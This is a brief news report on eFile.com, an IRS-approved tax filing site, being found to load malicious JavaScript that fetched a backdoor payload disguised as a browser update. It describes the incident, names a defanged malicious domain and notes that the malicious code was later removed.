eFile.com, an IRS-approved tax return software, found to be distributing JS malware

Multiple users and researchers have reported that eFile.com, a tax return software authorized by the IRS, has been caught serving malware. The malicious JavaScript file in question is called ‘popper.js’, which was being loaded by almost every page of eFile.com until at least April 1st. The ‘popper.js’ file contained a code that attempted to load JavaScript returned by an illicit domain, infoamanewonliag[.]online. The use of Math.random() at the end of the code was likely used to prevent caching and load a fresh copy of the malware. As of today, the file is no longer seen serving the malicious code.

On March 17th, multiple eFile.com users suspected that the website was “hijacked,” which was confirmed by researchers who spotted an additional file called ‘update.js’ associated with the attack. The ‘update.js’ file attempted to prompt users to download a next stage payload, depending on whether they were using Chrome or Firefox, which antivirus products have already flagged as trojans. The malware payload is a backdoor malware that allows the threat actor to remotely access an infected device. While this is only a basic backdoor, it has enough functionality to give full access to a device, allowing the threat actor initial access to a corporate network for further attacks. It is still unclear if the attack successfully infected any eFile.com visitors and customers.